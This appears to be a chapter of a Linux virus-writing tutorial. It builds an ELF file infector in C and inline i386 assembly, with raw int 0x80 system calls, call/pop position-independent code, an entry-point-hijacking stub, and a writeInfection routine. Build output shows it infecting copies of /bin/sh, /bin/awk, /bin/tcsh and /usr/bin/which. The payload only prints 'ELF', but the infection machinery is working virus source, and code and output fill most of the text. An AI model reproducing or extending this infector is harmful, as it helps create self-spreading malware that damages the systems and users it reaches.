Unix was not designed to stop people from doing stupid things, because that would also stop them from doing clever things.
Doug Gwyn
In The language of evil I declared the code generated by gcc(1) unsuitable for a virus, and then rewrote the whole thing in assembly. A less drastic solution is to use inline assembly to correct only what is really necessary.
Have a look at the disassembly of function write. That code checks the return value of the system call and sets variable errno on error. We don't need this. In fact, we can't access global variables at all, and our code does not care about the return value anyway.
It is also remarkable that the code loads only the four registers actually required. The glibc sources go to great lengths to provide optimal code for every case. I find the macros in glibc-2.2.4/sysdeps/unix/sysv/linux/i386/sysdep.h quite interesting.
For our needs a simple function will do. The line starting with a colon is an output constraint: "=a" (result) tells the compiler that the value of eax after the asm block is to be stored in variable result. The following return statement would load the value of result into eax again, but fortunately gcc(1) optimizes this away. Of course the code would work without the constraint and the return statement, since eax already holds the result when the function returns. But then the compiler would issue the warning "no return statement in function returning non-void".
RedHat's gcc-2.96-98 produces weird code if the assembly statements are grouped in a single asm block: mov ebp,esp is then executed not on function entry, but after the asm. See All together now for a disassembly; do_syscall is the last part, between the second and third ret instructions.
Note that we can't simply name our function syscall, because unistd.h already declares a function of that name.
Source - do_syscall.inc.
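int do_syscall(int number, ...)
{
int result;
/* ebx, esi and edi are callee-saved, so preserve them */
asm("push %ebx; push %esi; push %edi");
/* Read the arguments straight from the stack frame: 8(%ebp) is number,
   12(%ebp) to 28(%ebp) are up to five system call arguments. This assumes
   a standard frame (push ebp; mov ebp,esp) and the i386 Linux ABI. */
asm(
"mov 28(%%ebp),%%edi;"   /* 5th argument */
"mov 24(%%ebp),%%esi;"   /* 4th argument */
"mov 20(%%ebp),%%edx;"   /* 3rd argument */
"mov 16(%%ebp),%%ecx;"   /* 2nd argument */
"mov 12(%%ebp),%%ebx;"   /* 1st argument */
"mov 8(%%ebp),%%eax;"    /* system call number */
"int $0x80"              /* enter the kernel */
: "=a" (result)          /* eax after the asm goes to result */
);
asm("pop %edi; pop %esi; pop %ebx");
return result;
}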
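For comparison, here is a sketch of the same idea for x86-64 Linux, where extended-asm constraints load the registers instead of reading them from fixed offsets relative to ebp. It assumes the x86-64 system call convention (number in rax, arguments in rdi, rsi and rdx; syscall clobbers rcx and r11). raw_write is a hypothetical name. Like do_syscall it never touches errno: on failure the kernel returns a negative value.

```c
#include <stddef.h>
#include <unistd.h>

/* Hypothetical raw write(2) that bypasses libc and never touches errno.
   On x86-64 Linux the kernel returns -errno on failure. */
static long raw_write(int fd, const void *buf, size_t len)
{
#if defined(__x86_64__) && defined(__linux__)
    long ret;
    __asm__ volatile (
        "syscall"
        : "=a" (ret)              /* rax after the syscall ends up in ret */
        : "0" (1L),               /* rax = 1, __NR_write on x86-64 */
          "D" ((long)fd),         /* rdi = first argument */
          "S" (buf),              /* rsi = second argument */
          "d" (len)               /* rdx = third argument */
        : "rcx", "r11", "memory"  /* syscall overwrites rcx and r11 */
    );
    return ret;
#else
    return (long)write(fd, buf, len);   /* portable fallback via libc */
#endif
}
```

The "0" constraint ties the system call number to the same register as the output operand, which mirrors how do_syscall uses eax for both.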
Previous examples required a separate pass to build the insertable code. The output of the first pass is a single chunk of bytes. The only interface to the infector is the location to patch with the original entry address (4 bytes at offset 1).
The crucial lines are those in writeInfection where we pass the address of the chunk of bytes to write(2). In a real virus these lines will also be part of the inserted code. The naive approach is to patch these instructions on infection, but this again leads to a two-pass process, where the first pass is required to find the offsets of the patches. A more comfortable approach is to make the code position independent by calculating absolute addresses at run time. Note that gcc(1)'s option -fpic does not help with this problem at all, since such code depends on a global offset table resolved by the dynamic loader, and no loader does that for code inserted into a host.
-fpic
Generate position-independent code (PIC) suitable for use in a shared library, if supported for the target machine. Such code accesses all constant addresses through a global offset table (GOT). The dynamic loader resolves the GOT entries when the program starts (the dynamic loader is not part of GCC; it is part of the operating system). If the GOT size for the linked executable exceeds a machine-specific maximum size, you get an error message from the linker indicating that -fpic does not work; in that case, recompile with -fPIC instead. (These maximums are 16k on the m88k, 8k on the Sparc, and 32k on the m68k and RS/6000. The 386 has no such limit.)
The instruction pointer is a register that holds the address of the next instruction to execute. Unlike "real" registers, there is no direct way to retrieve its value on i386. A call pushes the current value of IP, which is the address of the instruction following the call, onto the stack and then adds a relative offset to IP. Offset 0 just continues with the following instruction. And if that instruction is a pop, we load the address of the pop instruction itself into a regular register.
We can compare the actual value of IP with the location the linker had in mind when it built the original executable. If the following code is executed at the exact location the linker gave it in the original file, then after the pop eax holds exactly the address of label delta, and the following sub instruction sets eax to zero. Anywhere else, eax ends up holding the distance between the actual and the intended location.
Source - get_relocate_ofs.inc.
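int get_relocate_ofs(void)
{
int result;
__asm__(
"call delta ;"          /* push address of delta, continue there */
"delta: "
"pop %%eax ;"           /* eax = run-time address of delta */
"sub $(delta),%%eax;"   /* minus link-time address of delta */
: "=a" (result)
);
return result;
}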
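To see the call/pop trick in isolation, here is a small sketch for x86 Linux with the GNU assembler. get_pc is a hypothetical stand-alone function written in top-level assembly; an inline asm inside a compiled x86-64 function could clobber the red zone when call pushes. It returns the address of its own pop instruction, which lies exactly 5 bytes after the function start because call rel32 is 5 bytes long. Hardware shadow stacks (Intel CET) would reject the unbalanced call/pop, so the sketch assumes they are not enforced.

```c
/* Hypothetical helper, x86 Linux + GNU as only: returns the address of
   the pop instruction inside get_pc itself, obtained with call/pop. */
void *get_pc(void);

__asm__(
    ".pushsection .text\n"
    ".globl get_pc\n"
    ".type get_pc, @function\n"
    "get_pc:\n"
    "    call 1f\n"              /* push address of label 1, jump there */
#if defined(__x86_64__)
    "1:  pop %rax\n"             /* rax = address of this pop */
#elif defined(__i386__)
    "1:  pop %eax\n"             /* eax = address of this pop */
#else
#error "call/pop sketch assumes x86"
#endif
    "    ret\n"
    ".size get_pc, .-get_pc\n"
    ".popsection\n"
);
```

Comparing the result with the address the linker assigned to get_pc gives the same kind of relocation offset that get_relocate_ofs computes.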
A dump from gdb(1) is not enough to demonstrate this function. I want to show that the last four bytes of the call instruction, its relative offset, are really zero.
Command - ndisasm.sh.
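#!/bin/sh
# usage: ndisasm.sh [file] [function] [number of ret to stop after]
file=${1:-tmp/doing_it_in_c/three/infector}
func=${2:-get_relocate_ofs}
count=${3:-1}
# look up the symbol address with nm; bc needs upper case hex digits
location=$( \
nm ${file} \
| sed -ne "/^[0-9].*${func}/s/ .*//p" \
| tr a-f A-F \
)
# file offset = virtual address - address where file offset 0 is mapped
offset=$( echo "ibase=16; ${location} - 08048000" | bc )
# disassemble as 32-bit code, stop after the count-th ret
ndisasm -e ${offset} -o 0x${location} -U ${file} \
| awk "{ print \$0; }
/ret/ && ++nr >= ${count} { exit 0; }"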
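The script hard-codes the assumption that file offset 0 is mapped at 0x08048000, which holds for the classic i386 layout used throughout this chapter. A more general mapping walks the PT_LOAD entries of the program header table. The following sketch, with the hypothetical name vaddr_to_offset, uses the Elf32_Phdr type from <elf.h>; for 0x08049654 and a first segment at 0x08048000 with file offset 0 it yields 0x1654, the same value the bc expression computes.

```c
#include <elf.h>
#include <stddef.h>

/* Map a virtual address to a file offset by searching the PT_LOAD entries of
   an i386 program header table. Returns -1 if no segment's file image
   contains the address (e.g. it lies in .bss or outside every segment). */
static long vaddr_to_offset(const Elf32_Phdr *phdr, size_t phnum, Elf32_Addr vaddr)
{
    for (size_t i = 0; i < phnum; i++) {
        const Elf32_Phdr *p = &phdr[i];
        if (p->p_type == PT_LOAD
            && vaddr >= p->p_vaddr
            && vaddr - p->p_vaddr < p->p_filesz)
            return (long)(vaddr - p->p_vaddr + p->p_offset);
    }
    return -1;
}
```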
Output - get_relocate_ofs.ndisasm.
08049654 55 push ebp
08049655 E800000000 call 0x804965a
0804965A 58 pop eax
0804965B 2D5A960408 sub eax,0x804965a
08049660 89E5 mov ebp,esp
08049662 5D pop ebp
08049663 C3 ret
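The call target can be checked by hand: a call rel32 (opcode E8) jumps to the address of the following instruction plus the signed 32-bit offset stored little-endian after the opcode. Here is a sketch of that decoding with the hypothetical helper call_rel32_target. For the instruction at 08049655 above the offset is 0, so the target is 0804965A, the pop itself; the same rule explains E804000000 in infection.inc jumping 4 bytes ahead to core.

```c
#include <stdint.h>

/* Decode the destination of an i386 "call rel32" (opcode E8) that starts at
   insn_addr. The 32-bit offset is little-endian and relative to the end of
   the 5-byte instruction. Returns 0 if code does not start with E8. */
static uint32_t call_rel32_target(uint32_t insn_addr, const unsigned char *code)
{
    if (code[0] != 0xE8)
        return 0;
    uint32_t rel = (uint32_t)code[1]
                 | (uint32_t)code[2] << 8
                 | (uint32_t)code[3] << 16
                 | (uint32_t)code[4] << 24;
    /* unsigned arithmetic wraps modulo 2^32, so negative offsets work too */
    return insn_addr + 5 + rel;
}
```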
We now have all the parts needed to implement a position independent version of Target::writeInfection. This code works as part of a first stage infector; output proving this is at the end of this chapter. It should also work as part of an infection. But do you remember the paragraph in Introduction about "exercise left to the reader"?
Compare this code with the first version. Instead of operating on a single variable, Target::infection, we write every byte between the start of infection and function end. Making sure that certain functions and constant data form one contiguous region requires little more than discipline and dirty tricks.
Source - write_infection.inc.
int do_syscall(int, ...);
#include "infection.inc"
#include "core.inc"
#include "do_syscall.inc"
void end() {}
#include "get_relocate_ofs.inc"
unsigned Target::writeInfection()
{
int ofs = get_relocate_ofs();
/* translate link-time addresses into run-time addresses */
char* r_begin = ofs + (char*)&infection;
char* r_end = ofs + (char*)&end;
unsigned size = r_end - r_begin;
/* system call 4 is write(2) on i386 Linux */
/* first byte is the opcode for "push" */
do_syscall(4, fd_dst, r_begin, 1);
/* next four bytes are the address to "ret" to */
do_syscall(4, fd_dst, &original_entry, sizeof(original_entry));
/* rest of infective code */
do_syscall(4, fd_dst, r_begin + 5, size - 5);
return size;
}
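To illustrate the byte layout writeInfection produces, here is an in-memory sketch; assemble_infection is a hypothetical name, not part of the infector. It copies the code and stores the original entry address little-endian at offset 1, i.e. as the immediate operand of the push opcode 0x68 at offset 0. Writing the bytes one by one avoids depending on the byte order of the machine running the sketch, which the original gets for free on i386.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical in-memory analogue of Target::writeInfection: copies the
   stub and patches the entry address into bytes 1..4. Returns the number
   of bytes written to out, or 0 if code is too short. */
static size_t assemble_infection(unsigned char *out, const unsigned char *code,
                                 size_t size, uint32_t original_entry)
{
    if (size < 5)
        return 0;                                   /* need push + imm32 */
    memcpy(out, code, size);                        /* opcode and the rest */
    out[1] = (unsigned char)(original_entry);       /* imm32, low byte first */
    out[2] = (unsigned char)(original_entry >> 8);
    out[3] = (unsigned char)(original_entry >> 16);
    out[4] = (unsigned char)(original_entry >> 24);
    return size;
}
```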
It is very difficult to persuade the linker to arrange object files in a specific order. But by putting all definitions into a single compilation unit (a .c file that ends up in one .o) we are quite safe on that front. And though no standard specifies it, most compilers emit definitions in the order they read them. So the "only" remaining problem is the implementation-specific assignment of definitions to sections. A small test program illustrates the problem.
Source - addr.c.
#include <stdio.h>
void* begin() { return "string literal"; }
static const char constant_a[] = "first try";
static const char constant_b[]
__attribute__ ((section (".text"))) = "second try";
void end() {}
int main(void)
{
printf("begin = %p\n", (void*)&begin);
printf("string literal = %p\n", begin());
printf("constant_a = %p\n", (const void*)constant_a);
printf("constant_b = %p\n", (const void*)constant_b);
printf("end = %p\n", (void*)&end);
return 0;
}
Output.
begin = 0x8048460
string literal = 0x8048562
constant_a = 0x8048558
constant_b = 0x804846a
end = 0x8048480
Functions are laid out in source order. Constant data, however, is put into a separate section called .rodata, and sections are arranged as a whole. Only constant_b, forced into .text by the section attribute, lands between begin and end. See the section-to-segment mapping in readelf(1)'s output at Bashful glance.
I see a few approaches to the problem.
Copy the complete code segment as defined by the program header table.
Define begin and end for each section to copy.
Put constant data into section .text.
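The second approach can be sketched with a GNU ld feature: for an output section whose name is a valid C identifier, the linker defines the symbols __start_NAME and __stop_NAME around it. The section name payload and the constants below are hypothetical; the sketch assumes GCC or Clang and GNU ld (or a compatible linker) on an ELF platform.

```c
#include <stddef.h>

/* Two constants placed in a custom section named "payload" (hypothetical).
   "used" keeps the compiler from discarding them. */
static const char msg_a[] __attribute__((section("payload"), used)) = "first";
static const char msg_b[] __attribute__((section("payload"), used)) = "second";

/* Defined by the linker because "payload" is a valid C identifier. */
extern const char __start_payload[];
extern const char __stop_payload[];

/* Size of the whole section: the region one would copy. */
static size_t payload_size(void)
{
    return (size_t)(__stop_payload - __start_payload);
}
```

The order of msg_a and msg_b inside the section is up to the compiler, which is the same caveat the text raises for functions and constants.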
Anyway, the real problem is accessing these bytes in a position independent fashion. For code this is more or less the default, since call and jmp work with relative offsets. Large, dense switch statements may be compiled into lookup tables of absolute addresses, but this is easy to work around. Explicit function pointers can be corrected manually with get_relocate_ofs. The same could be done with entries in virtual method tables, but the table itself is accessed by compiler-generated code, which is hard to correct.
However, every data access requires an explicit calculation through get_relocate_ofs. This includes innocent-looking string literals. Basically you always have to look at the disassembly of your C code to make sure.
In our trivial example Target::infection holds stub code written in assembler and is never accessed as data. In any case, here is the documentation of gcc(1) on the section attribute.
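The following sketch, with hypothetical names throughout, shows what such manual correction amounts to. A struct stands in for the inserted region; its table holds absolute pointers, like a jump table or a virtual method table. After the region is copied, each entry still points into the original until it is shifted by the distance between copy and original, the kind of value get_relocate_ofs computes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: the address ofs bytes away from p, i.e. where a byte
   that the linker placed at p lives in a copy shifted by ofs. */
static const void *reloc(const void *p, intptr_t ofs)
{
    return (const void *)((uintptr_t)p + (uintptr_t)ofs);
}

/* Stand-in for inserted code plus data: a string and a table of absolute
   pointers into it. */
struct region {
    char text[16];
    const char *table[2];
};

/* Copy a region and fix up the absolute pointers it contains. */
static void copy_region(struct region *dst, const struct region *src)
{
    memcpy(dst, src, sizeof *dst);   /* table entries still point into src */
    intptr_t ofs = (intptr_t)((uintptr_t)dst - (uintptr_t)src);
    for (size_t i = 0; i < 2; i++)
        dst->table[i] = reloc(src->table[i], ofs);
}
```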
section ("section-name")
Normally, the compiler places the objects it generates in sections like "data" and "bss". Sometimes, however, you need additional sections, or you need certain particular variables to appear in special sections, for example to map to special hardware. The "section" attribute specifies that a variable (or function) lives in a particular section.
This is the link between regular C code and the unsuspecting host. It has to meet three requirements:
The new entry point is at a constant offset inside the inserted code. The preferred value is 0.
The original entry address is patched into the inserted code at a constant offset. Previous examples used 1.
We need a mechanism to pass control back to the host code. Ideally we should leave no trace of our existence, but leaving the registers (especially esp) unmodified will suffice.
The code below relies on proper alignment by the compiler. An __attribute__ clause makes the character array Target::infection start at an address that is a multiple of 16. An assembler directive pads the stub with enough nop instructions to make its size a multiple of 16. This means that any object placed directly after the infection is also aligned on a multiple of 16. And 16 is typically the highest alignment an i386 compiler will use.
There is absolutely no reason for compiler or assembler to insert padding bytes between infection and the following function, called core.
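The padding arithmetic is simple: a stub of size bytes needs (16 - size % 16) % 16 filler bytes. Here is a sketch with a hypothetical pad_bytes helper and a copy of the stub bytes. The stub proper is 15 bytes long, so one nop brings it to 16, matching the single 0x90 at the end of infection.inc.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: filler bytes needed so that a stub of `size` bytes
   ends on a multiple of `align` (align must be non-zero). */
static size_t pad_bytes(size_t size, size_t align)
{
    return (align - size % align) % align;
}

/* Copy of the stub bytes: 15 bytes of code plus one nop (0x90) of padding.
   aligned(16) makes the array start on a 16-byte boundary. */
static const unsigned char stub[] __attribute__((aligned(16))) = {
    0x68, 0x00, 0x00, 0x00, 0x00,   /* push dword 0 */
    0x9C,                           /* pushf */
    0x60,                           /* pusha */
    0xE8, 0x04, 0x00, 0x00, 0x00,   /* call +4 */
    0x61,                           /* popa */
    0x9D,                           /* popf */
    0xC3,                           /* ret */
    0x90                            /* nop */
};
```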
Source - infection.asm.
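BITS 32
push dword 0 ; replace with original entry address
pushf        ; save flags
pusha        ; save general purpose registers
call core    ; run the infection core
popa         ; restore registers
popf         ; restore flags
ret          ; "return" to the original entry address pushed above
align 16     ; pad with nop to a multiple of 16 bytes
core: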
Source - infection.inc.
const unsigned char Target::infection[]
__attribute__ (( aligned(16), section(".text") )) =
{
0x68,0x00,0x00,0x00,0x00, /* 00000000: push dword 0x0 */
0x9C, /* 00000005: pushf */
0x60, /* 00000006: pusha */
0xE8,0x04,0x00,0x00,0x00, /* 00000007: call 0x10 */
0x61, /* 0000000C: popa */
0x9D, /* 0000000D: popf */
0xC3, /* 0000000E: ret */
0x90 /* 0000000F: nop */
};
If you consider the above code too much voodoo, think about the alternative. Functions compiled by gcc(1) are decorated with entry and exit code. The dump at the end of All together now is the next best example. I have no way to suppress that push ebp, and I also don't see how to put code between pop ebp and ret. So we would have to build our own exit code using inline assembly: basically a pop ebp and some kind of jmp. The exit code generated by gcc(1) would still be there, just unused. And that still leaves the problem of putting the original entry address somewhere.
The only missing piece is the actual infection core. This one just writes three bytes to standard output. The host's ELF header is mapped at 0x08048000, so the bytes at 0x08048001 are "ELF", which explains the ELF prefixes in the test output below.
Source - build.
void core()
{
/* write(1, 0x08048001, 3) */
do_syscall(4, 1, 0x08048001, 3);
}
And a disassembly, just to make sure. This is the complete inserted code. It consists of Target::infection, core and do_syscall, in that order.
Output.
08049600 6800000000 push dword 0x0
08049605 9C pushf
08049606 60 pusha
08049607 E804000000 call 0x8049610
0804960C 61 popa
0804960D 9D popf
0804960E C3 ret
0804960F 90 nop
08049610 55 push ebp
08049611 89E5 mov ebp,esp
08049613 83EC08 sub esp,byte +0x8
08049616 6A03 push byte +0x3
08049618 6801800408 push dword 0x8048001
0804961D 6A01 push byte +0x1
0804961F 6A04 push byte +0x4
08049621 E806000000 call 0x804962c
08049626 83C410 add esp,byte +0x10
08049629 C9 leave
0804962A C3 ret
0804962B 90 nop
0804962C 55 push ebp
0804962D 89E5 mov ebp,esp
0804962F 53 push ebx
08049630 56 push esi
08049631 57 push edi
08049632 8B7D1C mov edi,[ebp+0x1c]
08049635 8B7518 mov esi,[ebp+0x18]
08049638 8B5514 mov edx,[ebp+0x14]
0804963B 8B4D10 mov ecx,[ebp+0x10]
0804963E 8B5D0C mov ebx,[ebp+0xc]
08049641 8B4508 mov eax,[ebp+0x8]
08049644 CD80 int 0x80
08049646 5F pop edi
08049647 5E pop esi
08049648 5B pop ebx
08049649 5D pop ebp
0804964A C3 ret
Output - build.
Infecting copy of /bin/awk... wrote 76 bytes, Ok
Infecting copy of /bin/tcsh... wrote 76 bytes, Ok
Infecting copy of /usr/bin/which... wrote 76 bytes, Ok
Infecting copy of /bin/sh... wrote 76 bytes, Ok
Output - test.
ELF/home/alba/virus-writing-HOWTO/tmp/doing_it_in_c/three/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELFGNU Awk 3.1.0
Copyright (C) 1989, 1991-2001 Free Software Foundation.
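To check the magic number from the file side, here is a small sketch; has_elf_magic is a hypothetical name. It compares the first four bytes of a file with ELFMAG ("\177ELF") from <elf.h>. The bytes core() writes are bytes 1 to 3 of this magic.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if the file starts with the ELF magic, 0 if it does not,
   -1 if it cannot be opened. */
static int has_elf_magic(const char *path)
{
    unsigned char ident[SELFMAG];
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    size_t n = fread(ident, 1, sizeof ident, f);
    fclose(f);
    if (n != sizeof ident)
        return 0;                      /* file shorter than the magic */
    return memcmp(ident, ELFMAG, SELFMAG) == 0;
}
```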